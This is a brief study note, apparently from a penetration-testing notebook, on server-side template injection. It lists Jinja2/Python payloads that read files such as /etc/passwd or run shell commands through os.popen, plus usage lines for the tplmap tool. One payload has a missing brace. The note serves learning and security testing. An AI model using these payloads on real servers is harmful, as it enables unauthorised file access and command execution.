This is when a user is able to pass in a parameter that can control the template engine that is running on the server.

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/3971fa32-0190-4876-a303-e834c805ccc3/Untitled.png

For example in the code above we can input whatever in the field name and then that would be presented on the web page

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/e88e110c-5954-4276-b110-73cf56b53d26/Untitled.png

We can use certain payloads from this repository : https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server Side Template Injection#basic-injection

{{ ''.__class__.__mro__[2].__subclasses__()[40]()(<file>).read()}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]()('/etc/passwd').read()}} # To read passwd file
{config.__class__.__init__.__globals__['os'].popen('id').read()}}

We dont have to remember these payloads we can use a automated tool to our advantage :

tqlmap : https://github.com/epinna/tplmap

This tool can be download via the git repo and you can use pip2 to install its requirements

How to use this :

./tqlmap.py -u <URL>/?<vulnparam>  # For get requests
./tqlmap.py -u <URL> -d '<vulnparam>'  # For post requests